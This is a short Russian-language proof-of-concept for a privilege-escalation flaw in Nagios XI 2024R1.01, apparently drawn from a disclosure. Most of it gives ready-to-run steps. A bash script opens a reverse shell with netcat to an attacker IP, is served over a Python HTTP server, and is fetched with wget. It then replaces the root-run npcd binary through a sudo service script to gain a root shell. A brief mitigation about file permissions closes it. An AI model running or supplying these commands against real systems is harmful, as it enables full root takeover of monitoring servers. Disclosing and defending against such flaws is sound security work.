
Повышение привилегий в Nagios 2024R1.01
CVE обнаружено: Jarod Jaslow (MAWK)
От имени пользователя «NAGIOS» создайте на машине атакующего файл со следующим содержимым:
#!/bin/bash
nc -e /bin/bash <Attacker IP> 4445

Разместите файл на машине атакующего с помощью Python HTTP-сервера:
python3 -m http.server 8000

Запустите прослушивающий сервер Netcat (NC) на машине атакующего:
nc -nlvp 4445
Загрузите файл с машины атакующего:
wget http://<Attacker IP>:8000/npcd

Выполните следующие команды для повышения привилегий и получения соединения с правами root:
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
cp npcd /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd


Рекомендуется ограничить возможность пользователя «NAGIOS» записывать в исполняемые файлы служб Nagios, которые запускаются с правами root. Этого можно достичь путём внедрения более строгих прав на файлы и механизмов контроля доступа для соответствующих каталогов и файлов, связанных со службами Nagios.
Это должно быть исправлено в новых выпусках.
CVE: